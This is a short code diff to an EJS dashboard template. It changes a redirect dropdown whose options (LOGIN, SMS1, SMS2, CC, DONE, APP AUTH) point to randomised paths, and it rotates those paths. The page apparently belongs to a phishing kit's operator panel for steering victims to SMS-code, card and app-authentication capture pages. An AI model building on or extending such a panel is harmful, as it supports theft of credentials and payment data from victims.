--- a/views/dashboard.ejs
+++ b/views/dashboard.ejs
@@ -97,10 +97,10 @@
                 <select class="form-select" id="redirectUrlInput">
                   <option selected disabled>Choose...</option>
                   <option value="/">LOGIN</option>
-                  <option value="/RKnUB922z6Mf4HDwg3EZ">SMS1</option>
-                  <option value="/LGknmeM9HwWUWSutj6mJ">SMS2</option>
-                  <option value="/QcEwP85AgNE4pnL5mWSM">CC</option>
-                  <option value="/HfuRVXK8w8fLmT2vWHe8">DONE</option>
+                  <option value="/BfhMN3hPfFL88zgqtPAk">SMS1</option>
+                  <option value="/EEXnHMpMEHxNNMgX5Duh">SMS2</option>
+                  <option value="/3EtpVNHarRb8PqJfArbu">CC</option>
+                  <option value="<%=url%>">DONE</option>
                   <option value="/OOMPZ5nz4RnFvFV8s">APP AUTH</option>
 
                   
